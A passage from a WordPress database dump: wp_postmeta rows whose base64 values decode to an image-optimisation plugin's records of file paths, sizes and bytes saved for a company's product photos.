HM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtdHM0LXRocmVhZC1zZWFsYW50LTEtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtdHM0LXRocmVhZC1zZWFsYW50LTEtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDk3ODcsImlkIjoxOTY3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXRzNC10aHJlYWQtc2VhbGFudC0xLTIyNXgzNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LXRzNC10aHJlYWQtc2VhbGFudC0xLTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LXRzNC10aHJlYWQtc2VhbGFudC0xLTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ5Nzg5LCJpZCI6MTk2N31d'); 
INSERT INTO `wp_postmeta` VALUES (28902, 1966, 'wpfc_optimisation_reduction', '10683'); 
INSERT INTO `wp_postmeta` VALUES (28903, 1966, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBPTi1ibGVuZGVkLUVQT1hZLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBPTi1ibGVuZGVkLUVQT1hZLmpwZyIsIndpZHRoIjoyODMyLCJoZWlnaHQiOjQyNTYsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NDk3OTQsImlkIjoiMTk2NiJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBPTi1ibGVuZGVkLUVQT1hZLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBPTi1ibGVuZGVkLUVQT1hZLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRVBPTi1ibGVuZGVkLUVQT1hZLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo2NDksInRpbWUiOjE0ODM1NDk3OTcsImlkIjoxOTY2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQT04tYmxlbmRlZC1FUE9YWS01MzJ4ODAwLmpwZyIsIndpZHRoIjo1MzIsImhlaWdodCI6ODAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQT04tYmxlbmRlZC1FUE9YWS01MzJ4ODAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0VQT04tYmxlbmRlZC1FUE9YWS01MzJ4ODAwLmpwZyIsInJlZHVjdGlvbiI6MTA0MiwidGltZSI6MTQ4MzU0OTgwMSwiaWQiOjE5NjZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBPTi1ibGVuZGVkLUVQT1hZLTc2OHgxMTU0LmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6MTE1NCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUE9OLWJsZW5kZWQtRVBPWFktNzY4eDExNTQuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRVBPTi1ibGVuZGVkLUVQT1hZLTc2OHgxMTU0LmpwZyIsInJlZHVjdGlvbiI6MjAxNywidGltZSI6MTQ4MzU0OTgwNiwiaWQiOjE5NjZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBPTi1ibGVuZGVkLUVQT1hZLTEwNjV4MTYwMC5qcGciLCJ3aWR0aCI6MTA2NSwiaGVpZ2h0IjoxNjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQT04tYmxlbmRlZC1FUE9YWS0xMDY1eDE2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRVBPTi1ibGVuZGVkLUVQT1hZLTEwNjV4MTYwMC5qcGciLCJyZWR1Y3Rpb24iOjM3MzIsInRpbWUiOjE0ODM1NDk4MTEsImlkIjoxOTY2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQT04tYmxlbmRlZC1FUE9YWS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQT04tYmxlbmRlZC1FUE9YWS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0VQT04tYmxlbmRlZC1FUE9YWS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NTQyLCJ0aW1lIjoxNDgzNTQ5ODE0LCJpZCI6MTk2Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUE9OLWJsZW5kZWQtRVBPWFktMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUE9OLWJsZW5kZWQtRVBPWFktMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9FUE9OLWJsZW5kZWQtRVBPWFktMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjQ4NCwidGltZSI6MTQ4MzU0OTgxOCwiaWQiOjE5NjZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBPTi1ibGVuZGVkLUVQT1hZLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBPTi1ibGVuZGVkLUVQT1hZLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRVBPTi1ibGVuZGVkLUVQT1hZLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo1MDEsInRpbWUiOjE0ODM1NDk4MjEsImlkIjoxOTY2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQT04tYmxlbmRlZC1FUE9YWS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQT04tYmxlbmRlZC1FUE9YWS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0VQT04tYmxlbmRlZC1FUE9YWS01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6ODkxLCJ0aW1lIjoxNDgzNTQ5ODI1LCJpZCI6MTk2Nn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQT04tYmxlbmRlZC1FUE9YWS0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQT04tYmxlbmRlZC1FUE9YWS0yMjV4MzYwLmpwZyIsIndpZHRoIjoiMjI1IiwiaGVpZ2h0IjoiMzYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0VQT04tYmxlbmRlZC1FUE9YWS0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6ODI1LCJ0aW1lIjoxNDgzNTQ5ODI5LCJpZCI6MTk2Nn1d'); 
INSERT INTO `wp_postmeta` VALUES (28904, 1965, 'wpfc_optimisation_reduction', '102464'); 
INSERT INTO `wp_postmeta` VALUES (28905, 1965, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy0wMjgtNC1lMTQ3NDQ3NzkxNTk4NC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctMDI4LTQtZTE0NzQ0Nzc5MTU5ODQuanBnIiwid2lkdGgiOjQxMTgsImhlaWdodCI6Mzg0NCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1mcGctMDI4LTQtZTE0NzQ0Nzc5MTU5ODQuanBnIiwicmVkdWN0aW9uIjoxMDI0NTUsInRpbWUiOjE0ODM1NDk4NDQsImlkIjoiMTk2NSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy0wMjgtNC1lMTQ3NDQ3NzkxNTk4NC0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctMDI4LTQtZTE0NzQ0Nzc5MTU5ODQtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTAyOC00LWUxNDc0NDc3OTE1OTg0LTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ5ODQ3LCJpZCI6MTk2NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTAyOC00LWUxNDc0NDc3OTE1OTg0LTgwMHg3NDcuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo3NDcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy0wMjgtNC1lMTQ3NDQ3NzkxNTk4NC04MDB4NzQ3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1mcGctMDI4LTQtZTE0NzQ0Nzc5MTU5ODQtODAweDc0Ny5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDk4NTEsImlkIjoxOTY1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctMDI4LTQtZTE0NzQ0Nzc5MTU5ODQtNzY4eDcxNy5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjcxNywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTAyOC00LWUxNDc0NDc3OTE1OTg0LTc2OHg3MTcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWZwZy0wMjgtNC1lMTQ3NDQ3NzkxNTk4NC03Njh4NzE3LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0OTg1NSwiaWQiOjE5NjV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy0wMjgtNC1lMTQ3NDQ3NzkxNTk4NC0xNjAweDE0OTQuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTQ5NCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTAyOC00LWUxNDc0NDc3OTE1OTg0LTE2MDB4MTQ5NC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTAyOC00LWUxNDc0NDc3OTE1OTg0LTE2MDB4MTQ5NC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDk4NTksImlkIjoxOTY1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctMDI4LTQtZTE0NzQ0Nzc5MTU5ODQtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTAyOC00LWUxNDc0NDc3OTE1OTg0LTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWZwZy0wMjgtNC1lMTQ3NDQ3NzkxNTk4NC0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0OTg2MywiaWQiOjE5NjV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy0wMjgtNC1lMTQ3NDQ3NzkxNTk4NC0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctMDI4LTQtZTE0NzQ0Nzc5MTU5ODQtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTAyOC00LWUxNDc0NDc3OTE1OTg0LTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ5ODY1LCJpZCI6MTk2NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTAyOC00LWUxNDc0NDc3OTE1OTg0LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy0wMjgtNC1lMTQ3NDQ3NzkxNTk4NC0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1mcGctMDI4LTQtZTE0NzQ0Nzc5MTU5ODQtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDk4NjgsImlkIjoxOTY1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctMDI4LTQtZTE0NzQ0Nzc5MTU5ODQtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTAyOC00LWUxNDc0NDc3OTE1OTg0LTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWZwZy0wMjgtNC1lMTQ3NDQ3NzkxNTk4NC01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0OTg3MSwiaWQiOjE5NjV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTAyOC00LWUxNDc0NDc3OTE1OTg0LTIyNXgzNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy0wMjgtNC1lMTQ3NDQ3NzkxNTk4NC0yMjV4MzYwLmpwZyIsIndpZHRoIjoiMjI1IiwiaGVpZ2h0IjoiMzYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1mcGctMDI4LTQtZTE0NzQ0Nzc5MTU5ODQtMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDk4NzQsImlkIjoxOTY1fV0='); 
INSERT INTO `wp_postmeta` VALUES (28906, 1964, 'wpfc_optimisation_reduction', '787074'); 
INSERT INTO `wp_postmeta` VALUES (28907, 1964, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRXBvbi11bm1vZGlmaWVkLWVwb3h5LTEuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FcG9uLXVubW9kaWZpZWQtZXBveHktMS5qcGciLCJ3aWR0aCI6NDc1MiwiaGVpZ2h0IjozMTY4LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRXBvbi11bm1vZGlmaWVkLWVwb3h5LTEuanBnIiwicmVkdWN0aW9uIjo3ODcwNjUsInRpbWUiOjE0ODM1NDk4OTAsImlkIjoiMTk2NCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRXBvbi11bm1vZGlmaWVkLWVwb3h5LTEtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FcG9uLXVubW9kaWZpZWQtZXBveHktMS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0Vwb24tdW5tb2RpZmllZC1lcG94eS0xLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ5ODkyLCJpZCI6MTk2NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FcG9uLXVubW9kaWZpZWQtZXBveHktMS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0Vwb24tdW5tb2RpZmllZC1lcG94eS0xLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRXBvbi11bm1vZGlmaWVkLWVwb3h5LTEtODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDk4OTYsImlkIjoxOTY0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0Vwb24tdW5tb2RpZmllZC1lcG94eS0xLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0Z